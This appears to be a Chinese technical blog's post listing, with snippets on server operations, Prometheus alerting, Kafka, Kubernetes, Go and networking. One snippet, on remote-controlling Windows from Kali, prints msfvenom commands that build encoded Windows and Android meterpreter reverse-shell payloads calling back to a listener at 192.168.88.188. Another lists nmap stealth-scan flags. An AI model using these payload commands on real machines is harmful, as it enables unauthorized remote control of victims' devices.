- 博客(70)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 Centos8 Yum 源不可用替换
Centos8 不在维护,第三方的镜像站中均已移除CentOS 8的源,yum install 会报错建议更换源。[root@localhost /etc/yum.repos.d]# yum makecacheCentOS-8.0 - AppStream 19 B/s | 38 B 00:02 CentOS-8.0 - Base
2022-02-08 14:30:56
789
2
转载 安全信息守则
1.Do 规范1.1 General Security 通用安全条目 执行人 负责人 被访者应确保访客在前台登记访客信息,并在办公区域内需有人全程陪同 前台;相关对接人员 行政跟进 只有在得到IT人员的授权后,访客携带的电脑,手机才能连入公司网络 前台;相关对接技术负责任;运维技术部 行政跟进 公共wifi由IT运维部跟进 工作相关的任何非线下沟通都必须使用公司邮箱或钉钉 全体员工 各部门主管负责跟进 IT运维部负责定期抽查
2021-08-06 16:09:34
247
原创 springboot项目上传文件异常:
The temporary upload location [/tmp/tomcat.85447933677399421.10030/work/Tomcat/localhost/ROOT] is not valid
2021-06-10 17:03:49
271
1
原创 open**N获取用户登录&登出信息
安装和配置VPN不在详细说明问度娘即可。创建存储用户登陆日志的数据库sqlite3 /etc/openvpn/openvpn.dbSQLite version 3.6.20Enter ".help" for instructionsEnter SQL statements terminated with a ";"sqlite> #进入sqlite数据库后创建表CREATE TABLE "t_logs" ("id" INTEGER PRIMARY KEY AUTOINCREMEN
2020-12-03 14:27:40
1197
转载 prometheus告警技术初探(一)
告警规则global:scrape_interval:15sevaluation_interval:15s#每过15秒执行一次报警规则,也就是说15秒执行一次报警alerting:alertmanagers:-static_configs:-targets:["localhost:9093"]#设置报警信息推送地址,一般而言设置的是alertManager的地址rule_files:-"test_rules.yml"...
2020-11-17 14:36:05
721
转载 常用prometheus告警规则模板(三)
应用类相关1.监控应用是否可用规则模板 :up=${value}规则描述:监测应用是否可用参数说明:value:0表示宕机1表示可用具体应用groups:-name:example#报警规则组的名字rules:-alert:InstanceDown#检测job的状态,持续1分钟metrices不能访问会发给altermanager进行报警expr:up==0for:1m#持续时...
2020-11-17 14:34:18
1121
转载 prometheus告警规则设置(二)
告警规则的设置是通过yml文件来设置,因此需要遵从yml的语法groups:-name:example#报警规则组的名字rules:-alert:InstanceDown#检测job的状态,持续1分钟metrices不能访问会发给altermanager进行报警expr:up==0for:1m#持续时间,表示持续一分钟获取不到信息,则触发报警labels:serverity:page#自定义...
2020-11-17 14:32:55
2490
1
转载 zuul ribbon设置url级别的超时时间
zuul ribbon设置url级别的超时时间##timeout confighystrix: command: default: execution: timeout: enabled: true isolation: thread: timeoutInMilliseconds: 60000ribbon: ReadTimeout: 60000 ConnectTimeo.
2020-09-09 19:59:43
1073
2
原创 nmap 常用参数
-sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。-sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。-sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式-sP ping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。-sU UDP扫描,但UDP扫描是不可靠的-sA 这项高级.
2020-09-03 10:54:08
314
转载 MySQL 5.7 GroupReplication 高可用架构
MySQL 5.7 GroupReplication 高可用架构1、背景主从复制,一主多从,主库提供读写功能,从库提供只读功能。当一个事务在master 提交成功时,会把binlog文件同步到从库服务器上落地为relay log给slave端执行,这个过程主库是不考虑从库是否有接收到binlog文件,有可能出现这种情况,当主库commit一个事务后,数据库发生宕机,刚好它的binlog还没来得及传送到slave端,这个时候选任何一个slave端都会丢失这个事务,造成数据不一致情况。 为了避免出现主.
2020-08-17 00:31:23
400
原创 TCP拥塞控制简述
为什么要有拥塞控制?不是有流量控制了吗?前面的流量控制是避免【发送方】的数据填满【接收方】的缓存,但是并不知道网路中发生了什么。一般来说,计算机网络都处于一个共享的环境。因此也有可能会因为其他主机之间的通信使得网络拥堵。在网络出现拥堵时,如果继续发送大量数据包,可能会导致数据包延时、丢失等,这时TCP就会重传数据,但是一重传就会导致网络的负担更重,于是会导致更大的延时以及更多的丢包,这个情况就会进入恶性循环被不断地放大...所以,TCP不能忽略网络上发生的事,它被设计成一个无私的协议,.
2020-08-10 20:33:48
552
原创 kali metasploit 远程控制Windows
一、在kali中生成被控制端程序root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.188 LPORT=5555 R
2020-07-08 14:10:31
2178
1
原创 Jenkins 插件安装加速
国内Jenkins安装插件的时候速度慢,需要替换default.json 文件中的配置并重启。cd .jenkins/updates/ #找到Jenkins路径替换镜像地址和google地址sed -i 's/http:\/\/updates.jenkins-ci.org\/download/https:\/\/mirrors.tuna.tsinghua.edu.cn\/jenki...
2020-04-11 16:47:43
146
原创 mac os 安装 bee 报错解决方法
beego 是一个快速开发 Go 应用的 HTTP 框架、但在安装bee的时候出现错误具体错误和解决方法如下。运行报错 go get -u github.com/beego/beego: github.com/beego/bee imports github.com/beego/bee/cmd imports github.com/beego/bee/cmd/comma...
2020-03-29 08:52:45
1101
1
原创 ffmpeg 安装与常用命令
使用ffmpeg 下载合成m3u8视频文件,搜到这篇文章常用命令写的比较详细。mac os 使用brew reinstall ffmpeg 安装ffmpeg 在终端直接可以使用。ffmpeg常用命令如果想多了解一些FFmpeg的编码原理可以看下面链接:FFmpeg编解码原理...
2020-03-18 13:41:34
107
原创 dns over https(doh)解决DNS劫持方案
这些年DNS劫持一直是比较头疼的问题(ISP 滥用用于注入广告,同时也导致了隐私泄漏等)虽然https可以解决网页加密的问题,但在DNS解析环节还是通过UDP 53端口明文传输,移动端(APP)可以使用httpdns,但对于web端来说依然的使用传统DNS,为了解决这个问题各大浏览器及DNS厂商也开始支持DOH(DNS-OVER-HTTPS)对DNS解析进行加密解决localdns 劫持问...
2020-03-13 13:14:25
9130
原创 mysql 索引数据结构(笔记)
mysql 支持多种存储引擎,各种存储引擎支持也各不相同,因此mysql数据库支持多种索引类型如(BTrees索引、哈希索引、全文索引等等)索引的用途:帮助mysql高效获取数据的数据结构。索引使用策略及优化: mysql优化主要分为结构优化和查询优化。 一般在数据库系统或文件系统中使用的B+Tree结构都在经典B+Tree的基础上进行了优化,增加了顺序访问指针。B...
2020-03-12 12:32:09
4486
原创 kafka 笔记
kafka名词解释broker: 消息中间件处理节点,一个kafka节点就是一个broker,一个或者多个broker组成一个kafka集群。topic: 主题,kafka根据topic对消息进行归类,发布到kafka集群的每条消息都需要指定一个topic。producer: 消息产生者,向broker发送消息的客户端。consumer:消息消费者、从broker读取消息的客户端。con...
2020-03-12 11:49:28
4430
原创 IDC BGP 选型、出海线路
目前市场上IDC 服务商都说自己的线路是BGP,但BGP有些是动态BGP、有些是静态BGP、两者间的链路质量差别还是比较大的。下面说说两者间的区别。真BGP成本=AS+IP地址段+设备成本+动态(BGP)带宽伪BGP成本=AS+IP地址段+设备成本+静态带宽真BGP和伪BGP链路效果的差异:真BGP实现了用户最佳路径的自动选择,即使遇到单条线路故障,BGP依然可以自动...
2020-03-09 11:41:59
6155
原创 DNS 劫持常见解决方案
常见解决方案:1、使用https 协议。2、app 使用 httpdns, 绕过了运营商DNS,直接通过https://httpdnsip/dn?=xxx.xxx.xxx3、内容安全策略 (CSP)是一个额外的安全层,用于检测并削弱某些特定类型的攻击,包括跨站脚本 (XSS)和数据注入攻击等。无论是数据盗取、网站内容污染还是散发恶意软件,这些攻击都是主要的手段。4、SRI是s...
2020-03-07 20:13:08
6335
原创 HTTP 长连接
先理解下长连接和短链接短连接: 短连接就是每次请求一个资源就建立连接,请求完成后连接立马关闭。每次请求都经过“创建tcp连接->请求资源->响应资源->释放连接”这样的过程长连接: 长连接(persistent connection),就是只建立一次连接,多次资源请求都复用该连接,完成后关闭。要请求一个页面上的十张图,只需要建立一次tcp连接,然后依次请求十张图,...
2020-03-05 15:25:05
6107
原创 DPDK 网络IO 优化
一、Linux + x86网络IO瓶颈1.传统的收发报文方式都必须采用硬中断来做通讯,每次硬中断大约消耗100微秒,这还不算因为终止上下文所带来的Cache Miss。2.数据必须从内核态用户态之间切换拷贝带来大量CPU消耗,全局锁竞争。3.收发包都有系统调用的开销。4.内核工作在多核上,为可全局一致,即使采用Lock Free,也避免不了锁总线、内存屏障带来的性能损耗。5.从...
2020-02-28 21:29:11
7533
1
原创 go 常用模块
fmt 模块:Println 输出Printf 格式化输出<br>Scanln 获取参数(传参,类似python的input)如:var name stringfmt.Scanln(&name)fmt.Println(name) //结果就是输入的值 Scanf 接受参数(也是类似python的input作用)例子:package ma...
2020-02-23 15:59:46
8637
原创 go 国内加速配置
在国内go获取包的时候非常慢使用goproxy的代理速度会快很多。1、Mac os linux 配置vim /etc/profile #编辑输入下面两行$env:GO111MODULE="on"$env:GOPROXY="https://goproxy.io"source /etc/profile2、Windows 设置cmd 命令行执行$env:GO1...
2020-02-20 19:32:20
10389
转载 最新版Nginx 内置变量
nginx内置变量内置变量存放在 ngx_http_core_module 模块中,变量的命名方式和apache 服务器变量是一致的。总而言之,这些变量代表着客户端请求头的内容,例如$http_user_agent, $http_cookie, 等等。下面是nginx支持的所有内置变量:$arg_name请求中的的参数名,即“?”后面的arg_name=arg_value形式的arg_n...
2020-02-18 21:37:14
8456
转载 Helm 从入门到实践
Helm 是什么??Helm 是 Kubernetes 的包管理器。包管理器类似于我们在 Ubuntu 中使用的apt、Centos中使用的yum 或者Python中的 pip 一样,能快速查找、下载和安装软件包。Helm 由客户端组件 helm 和服务端组件 Tiller 组成, 能够将一组K8S资源打包统一管理, 是查找、共享和使用为Kubernetes构建的软件的最佳方式。Helm ...
2020-02-10 13:18:17
9392
原创 redis psync1和psync2 同步详解
Redis2.8 psync1解决什么问题 在psync1功能出现前(redis2.8之前的版本),redis复制秒级中断,就会触发从实例进行fullsync。每一次的fullsync,集群的性能和资源使用都可能带来抖动;如果redis所处的网络环境不稳定,那么fullsync的出步频率可能较高。为解决此问题,redis2.8引入psync1, 有效地解决这种复制闪断,带来的影...
2020-02-10 12:50:04
9143
原创 有状态pod部署
statefulset保证了pod在重新调度后保留他们的标识和状态,statefulset创建的每个副本并不完全一样,每个pod都可以拥有一组独立的数据卷(持久化状态)、pod名字都是有规律的(固定的)。稳定的网络标识 statefulset创建的每个pod都一个从零开始的顺序索引,这个会体现在pod的主机名和pod对应的固定存储上,这些名称都是可预知的。因为它是由statefu...
2019-10-08 13:52:30
347
原创 Grafana展示Web访问日志分析及查询语句
$hostname 和$$myinterval 环境变量设置如下图:通过阿里云日志服务API接口查询语句。1、查询系统全后端请求延迟 $hostname | select avg(request_time) as response_time, avg(upstream_response_time) as upstream_response_ti...
2019-09-17 13:33:49
12996
1
原创 有状态的pod (statfulset )
有状态pod部署 statefulset保证了pod在重新调度后保留他们的标识和状态,statefulset创建的每个副本并不完全一样,每个pod都可以拥有一组独立的数据卷(持久化状态)、pod名字都是有规律的(固定的)。稳定的网络标识 statefulset创建的每个pod都一个从零开始的顺序索引,这个会体现在pod的主机名和pod对应的固定存储上,这些名称都是可预知的。因为...
2019-08-27 16:42:11
8501
原创 网络测试及探测命令
1、网络性能测试(iperf) iperf 是一个网络性能测试工具。Iperf可以测试最大TCP和UDP带宽性能。Iperf具有多种参数和UDP特性,可以根据需要调整。iperf可以报告带宽,延迟抖动和数据包丢失。 参数:-i 设置iperf输出结果的时间间隔 -m 在结果中显示TCP的MSS大小 -u 使用UDP协议 -M 设置TCP的MSS大小 -s 以...
2019-08-22 18:06:15
9298
原创 pod 升级与回滚
pod 升级方式:1、删掉旧pod,在部署新pod.2、创建新pod,通过修改service选择器后删除旧pod3、滚动式升级 rolling-update4、使用deployment声明方式升级前两者不在详述,都需要中断业务。kubectl 滚动式升级:实验: 定义kubia-v1 YAML 文件创建POD 和serviceapiVersion...
2019-08-13 17:44:43
9226
原创 Python 备份MySQL
没有找到相关模块,使用Python +shell 方式备份数据库。# -*- coding:utf-8 -*-import os,time,datetimeDB_HOST='127.0.0.1'DB_USER='root'DB_USER_PASSWD=' 'DB_NAME='/opt/dbname.txt'BACKUP_PATH='/data/backup/'DATETI...
2019-08-09 14:16:02
9205
原创 Linux free 输出结果解释
free 命令分为两个版本具体区别及解释如下:free命令的所有输出值都是从/proc/meminfo中读出的.free -m 输出结果 (旧版)[root@iz2zecfhh5u99sv81mxg62z ~]# free -m total used free shared buffers cached...
2019-08-01 11:17:52
11205
转载 kubernetes dashboard
kubernetes-dashboard有两种认证方式,一个token认证,另一个是Kubeconfig文件的认证。这个时候的认证不是UserAccount而是获取kubernetes集群资源信息的serviceAccount。 token 认证# 创建一个dashboard的私钥cd /etc/kubernetes/pki/(umask 077; openssl ge...
2019-07-25 17:03:11
9378
原创 python requests 模块访问https链接报错
python requests 模块访问https链接报错如下:/usr/lib/python2.6/site-packages/requests-2.9.1-py2.6.egg/requests/packages/urllib3/util/ssl_.py:315: SNIMissingWarning: An HTTPS request has been made, but the SNI...
2019-07-25 16:27:26
1368
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人